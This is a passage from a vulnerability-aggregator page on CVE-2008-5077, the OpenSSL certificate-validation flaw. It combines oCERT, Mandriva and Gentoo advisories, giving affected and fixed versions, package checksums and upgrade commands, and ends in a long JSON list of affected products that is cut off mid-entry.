    ZXID <= 0.29

    1 - use of OpenSSL as an SSL/TLS client when connecting to a server whose certificate uses an RSA key is NOT affected. Verification of client certificates by OpenSSL servers for any key type is NOT affected.

    2 - Belgian eID middleware latest versions are not available in source form, therefore we cannot confirm if they are affected

    Fixed version:

    OpenSSL >= 0.9.8j

    NTP >= 4.2.4p6 (production), >= 4.2.5p153 (development)

    Sun GridEngine >= 6.0

    Gale N/A

    OpenEvidence N/A

    Belgian eID middleware - eidlib N/A

    Freedom Network Server N/A

    BIND >= 9.3.6-P1, 9.4.3-P1, 9.5.1-P1, 9.6.0-P1

    Lasso >= 2.2.2

    ZXID N/A

    Credit: Google Security Team (for the original OpenSSL issue).

    CVE: CVE-2008-5077 (OpenSSL), CVE-2009-0021 (NTP), CVE-2009-0025 (BIND)

    Timeline: 2008-12-16: OpenSSL Security Team requests coordination aid from oCERT 2008-12-16: oCERT investigates packages affected by similar issues 2008-12-16: contacted affected vendors 2008-12-17: investigation expanded to DSA verification 2008-12-17: BIND, Lasso and ZXID added to affected packages 2008-12-18: contacted additional affected vendors 2009-01-05: status updates and patch dissemination to affected vendors 2009-01-05: confirmation from BIND of issue and fix 2009-01-06: requested CVE assignment for BIND 2009-01-07: advisory published

    References: http://openssl.org/news/secadv_20090107.txt

    Links: http://openssl.org/ http://www.ntp.org/ http://gridengine.sunsource.net/ http://gale.org/ http://www.openevidence.org/ http://eid.belgium.be/ http://www.google.com/codesearch/p?#1vGzyQX--LU/achilles/remailer/zero-knowledge/freedomserver-2.x.tgz/ https://www.isc.org/products/BIND http://lasso.entrouvert.org/ http://www.zxid.org/

    Permalink: http://www.ocert.org/advisories/ocert-2008-016.html

    -- Will Drewry redpig@ocert.org oCERT Team :: http://ocert.org .

    Background

    ntp contains the client and daemon implementations for the Network Time Protocol.

    The updated packages have been patched to prevent this issue.


    References:

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5077


    Updated Packages:

    Mandriva Linux 2008.0: 6585e08eab279e6a249630385683bf43 2008.0/i586/libopenssl0.9.8-0.9.8e-8.2mdv2008.0.i586.rpm b5955c2c0a2cc24abd9f5f3ebc7d0148 2008.0/i586/libopenssl0.9.8-devel-0.9.8e-8.2mdv2008.0.i586.rpm 7c92323d7aa583b936ef908f3f6ac867 2008.0/i586/libopenssl0.9.8-static-devel-0.9.8e-8.2mdv2008.0.i586.rpm 2b791168311c3ecba4f8b7acd24e64ab 2008.0/i586/openssl-0.9.8e-8.2mdv2008.0.i586.rpm cf51c48e4c05ac5357f6076fbaeff0a5 2008.0/SRPMS/openssl-0.9.8e-8.2mdv2008.0.src.rpm

    Mandriva Linux 2008.0/X86_64: 6259ac00622227eee59f888bc516bc3a 2008.0/x86_64/lib64openssl0.9.8-0.9.8e-8.2mdv2008.0.x86_64.rpm fe745327c1bbb599e025a5b90bb05817 2008.0/x86_64/lib64openssl0.9.8-devel-0.9.8e-8.2mdv2008.0.x86_64.rpm bdb7113b06aab0c4d77cbf86bcf208c2 2008.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8e-8.2mdv2008.0.x86_64.rpm d4fda198a80b88c7caaf947af0866df8 2008.0/x86_64/openssl-0.9.8e-8.2mdv2008.0.x86_64.rpm cf51c48e4c05ac5357f6076fbaeff0a5 2008.0/SRPMS/openssl-0.9.8e-8.2mdv2008.0.src.rpm

    Mandriva Linux 2008.1: 4a0be98cd3fb82a22e3836c5ae81ed37 2008.1/i586/libopenssl0.9.8-0.9.8g-4.2mdv2008.1.i586.rpm 277058ecc1d26d24bf4da5ea27d4a31f 2008.1/i586/libopenssl0.9.8-devel-0.9.8g-4.2mdv2008.1.i586.rpm 29b08a5a233f1987c4ca98aaa4e97ac5 2008.1/i586/libopenssl0.9.8-static-devel-0.9.8g-4.2mdv2008.1.i586.rpm e47be879abc0c089a8f380469a6a62c8 2008.1/i586/openssl-0.9.8g-4.2mdv2008.1.i586.rpm 7395d0e10c1938be16261baba05da55c 2008.1/SRPMS/openssl-0.9.8g-4.2mdv2008.1.src.rpm

    Mandriva Linux 2008.1/X86_64: 71a69804b928a9f7856f65fee332c5ab 2008.1/x86_64/lib64openssl0.9.8-0.9.8g-4.2mdv2008.1.x86_64.rpm e9c5d1d4895a5a679945bde62df6f988 2008.1/x86_64/lib64openssl0.9.8-devel-0.9.8g-4.2mdv2008.1.x86_64.rpm 7f2d66839f93e2083dcd1b1f27ca4ddf 2008.1/x86_64/lib64openssl0.9.8-static-devel-0.9.8g-4.2mdv2008.1.x86_64.rpm 40408ffdf13faa6c79b28c764bb88b22 2008.1/x86_64/openssl-0.9.8g-4.2mdv2008.1.x86_64.rpm 7395d0e10c1938be16261baba05da55c 2008.1/SRPMS/openssl-0.9.8g-4.2mdv2008.1.src.rpm

    Mandriva Linux 2009.0: 2512f6a41e9a8e7bcff53e5737029689 2009.0/i586/libopenssl0.9.8-0.9.8h-3.1mdv2009.0.i586.rpm d7774faaed2866da5bb05cbcf07604da 2009.0/i586/libopenssl0.9.8-devel-0.9.8h-3.1mdv2009.0.i586.rpm ed99160bdf1ce33fa81dc47c71915318 2009.0/i586/libopenssl0.9.8-static-devel-0.9.8h-3.1mdv2009.0.i586.rpm 6116fafed014596ee1e6ec43db93133f 2009.0/i586/openssl-0.9.8h-3.1mdv2009.0.i586.rpm 8ad6b0d8aff3bb992d716668450aef3a 2009.0/SRPMS/openssl-0.9.8h-3.1mdv2009.0.src.rpm

    Mandriva Linux 2009.0/X86_64: d2cc04fc0bdaeea8e4cc5d7ab4e997fd 2009.0/x86_64/lib64openssl0.9.8-0.9.8h-3.1mdv2009.0.x86_64.rpm b537da3113c75f87c4fa8d66be2d6797 2009.0/x86_64/lib64openssl0.9.8-devel-0.9.8h-3.1mdv2009.0.x86_64.rpm ef9add2bec302b324b9c0690cf79b57c 2009.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8h-3.1mdv2009.0.x86_64.rpm 16b8c11f4d6dedf2e4176bfc55607c15 2009.0/x86_64/openssl-0.9.8h-3.1mdv2009.0.x86_64.rpm 8ad6b0d8aff3bb992d716668450aef3a 2009.0/SRPMS/openssl-0.9.8h-3.1mdv2009.0.src.rpm

    Corporate 3.0: 5e8f4b7c1e646d0e16af2d83238a011b corporate/3.0/i586/libopenssl0.9.7-0.9.7c-3.9.C30mdk.i586.rpm 5115d911b9a6842fd0c3495429c7c2f2 corporate/3.0/i586/libopenssl0.9.7-devel-0.9.7c-3.9.C30mdk.i586.rpm b934b4f9686deef6cb1eba750ab36288 corporate/3.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.9.C30mdk.i586.rpm 11ec8a4df261d4d4fa9957d33be08604 corporate/3.0/i586/openssl-0.9.7c-3.9.C30mdk.i586.rpm dcd1a4feb1a04302c54465dce7c7c506 corporate/3.0/SRPMS/openssl-0.9.7c-3.9.C30mdk.src.rpm

    Corporate 3.0/X86_64: 64521521330df90b42c9c37cafe50b54 corporate/3.0/x86_64/lib64openssl0.9.7-0.9.7c-3.9.C30mdk.x86_64.rpm 3a85c30c0511e42ec76c80e08efe5192 corporate/3.0/x86_64/lib64openssl0.9.7-devel-0.9.7c-3.9.C30mdk.x86_64.rpm 12af66f30c5022d8d29b57a9131458c3 corporate/3.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7c-3.9.C30mdk.x86_64.rpm 62f5c54be99ddc9458670ae04b24d3f0 corporate/3.0/x86_64/openssl-0.9.7c-3.9.C30mdk.x86_64.rpm dcd1a4feb1a04302c54465dce7c7c506 corporate/3.0/SRPMS/openssl-0.9.7c-3.9.C30mdk.src.rpm

    Corporate 4.0: 60c64d9ead2b01fb39058a705fcb95dc corporate/4.0/i586/libopenssl0.9.7-0.9.7g-2.7.20060mlcs4.i586.rpm fb4d5555c211b375707bf7d194e74776 corporate/4.0/i586/libopenssl0.9.7-devel-0.9.7g-2.7.20060mlcs4.i586.rpm c13ff967b4310e5a790e85595f940b7e corporate/4.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.7.20060mlcs4.i586.rpm e9a96a389c00ee674d689e3747c3e501 corporate/4.0/i586/openssl-0.9.7g-2.7.20060mlcs4.i586.rpm 4df38ebd98b467bdee0d4a24d3b0158f corporate/4.0/SRPMS/openssl-0.9.7g-2.7.20060mlcs4.src.rpm

    Corporate 4.0/X86_64: de71d0bbc98589afdf03b7a99aad7103 corporate/4.0/x86_64/lib64openssl0.9.7-0.9.7g-2.7.20060mlcs4.x86_64.rpm 0c330148b55987e50f491c7e4d3b65a5 corporate/4.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.7.20060mlcs4.x86_64.rpm ce64720b2685fada3e88a5725c43b532 corporate/4.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.7.20060mlcs4.x86_64.rpm 29f0f40602184d7f366e1d1d8e5c03e4 corporate/4.0/x86_64/openssl-0.9.7g-2.7.20060mlcs4.x86_64.rpm 4df38ebd98b467bdee0d4a24d3b0158f corporate/4.0/SRPMS/openssl-0.9.7g-2.7.20060mlcs4.src.rpm

    Multi Network Firewall 2.0: 74a4beac1c01f9fd888dd5eea356f7be mnf/2.0/i586/libopenssl0.9.7-0.9.7c-3.9.C30mdk.i586.rpm c809a08f26051c7a3931ccda00c94429 mnf/2.0/i586/openssl-0.9.7c-3.9.C30mdk.i586.rpm 8ae9f7004b77dca2317980ba4215dc92 mnf/2.0/SRPMS/openssl-0.9.7c-3.9.C30mdk.src.rpm


    To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

    All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

    gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

    You can view other update advisories for Mandriva Linux at:

    http://www.mandriva.com/security/advisories

    If you want to report vulnerabilities, please contact

    security_(at)_mandriva.com


    Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux)

    iD8DBQFJZqIYmqjQ0CJFipgRAqRNAKDNNvWgsIk0/eh5f8539zOJ7dtnnQCeJezP ZE8i9Ju80WcdhXe9yIoPevE= =9n1t -----END PGP SIGNATURE-----


    Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200902-02


                                            http://security.gentoo.org/
    

    Severity: Normal Title: OpenSSL: Certificate validation error Date: February 12, 2009 Bugs: #251346 ID: 200902-02


    Synopsis

    An error in the OpenSSL certificate chain validation might allow for spoofing attacks.

    Background

    OpenSSL is an Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general purpose cryptography library.

    Impact

    A remote attacker could exploit this vulnerability and spoof arbitrary names to conduct Man-In-The-Middle attacks and intercept sensitive information.

    Workaround

    There is no known workaround at this time.

    Resolution

    All OpenSSL users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/openssl-0.9.8j"
    

    References

    [ 1 ] CVE-2008-5077 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5077

    Availability

    This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200902-02.xml

    Concerns?

    Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

    License

    Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

    The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

    http://creativecommons.org/licenses/by-sa/2.5

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.3"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.1c"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.5"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.3a"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.2b"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.4"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7b"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.6l"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8d"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.5a"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7g"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.6i"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8e"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8g"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.6f"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7k"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.6d"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.6c"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7e"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7c"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8a"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7j"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7d"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.6k"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7f"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.6a"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.6b"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.6m"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8b"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7a"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.6g"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.6e"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7h"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7l"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.6h"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8f"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7i"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8c"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8h"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.6j"
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.6,
            "vendor": "no",
            "version": null
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "openssl",
            "version": "0.9.8h"
          },
          {
            "_id": null,
            "model": "bind a1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.5"
          },
          {
            "_id": null,
            "model": "bigip application security manager",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 95",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2.6"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8f",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.6"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 93",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "email and web security appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mcafee",
            "version": "5.6"
          },
          {
            "_id": null,
            "model": "networks enterprise voip tm-cs1000",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-26000"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "project openssl g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "pfsense 1.2-rc4",
            "scope": null,
            "trust": 0.3,
            "vendor": "bsdperimeter",
            "version": null
          },
          {
            "_id": null,
            "model": "networks switched firewall series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5700"
          },
          {
            "_id": null,
            "model": "big-ip local traffic manager",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0.1"
          },
          {
            "_id": null,
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.5"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.4"
          },
          {
            "_id": null,
            "model": "linux enterprise sp2 debuginfo",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "firepass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "appliance server hosting edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.4"
          },
          {
            "_id": null,
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.7"
          },
          {
            "_id": null,
            "model": "cwrsync",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.0.9"
          },
          {
            "_id": null,
            "model": "bind a5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 99",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "bind b3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.6.4"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.7"
          },
          {
            "_id": null,
            "model": "bind b4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "cwrsync",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.1.3"
          },
          {
            "_id": null,
            "model": "project openssl b-36.8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4.3"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.1"
          },
          {
            "_id": null,
            "model": "bigip global traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3.1"
          },
          {
            "_id": null,
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "grid engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.5"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 100",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.2"
          },
          {
            "_id": null,
            "model": "wanjet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "2210"
          },
          {
            "_id": null,
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.1"
          },
          {
            "_id": null,
            "model": "bind -p1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.6"
          },
          {
            "_id": null,
            "model": "bigip application security manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "sparc enterprise m3000",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.2"
          },
          {
            "_id": null,
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "8"
          },
          {
            "_id": null,
            "model": "cwrsync",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.1.4"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.3"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.3"
          },
          {
            "_id": null,
            "model": "firepass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "6.0.2.3"
          },
          {
            "_id": null,
            "model": "linux enterprise server sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.6"
          },
          {
            "_id": null,
            "model": "cwrsync",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.1.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 85",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 19",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "appliance server workgroup edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 45",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "-prerelease",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.6"
          },
          {
            "_id": null,
            "model": "big-ip local traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "message networking",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "meeting exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0.0.52"
          },
          {
            "_id": null,
            "model": "sparc enterprise m9000",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 78",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.5"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.1"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "bind 9.5.0a7",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.5"
          },
          {
            "_id": null,
            "model": "mac os",
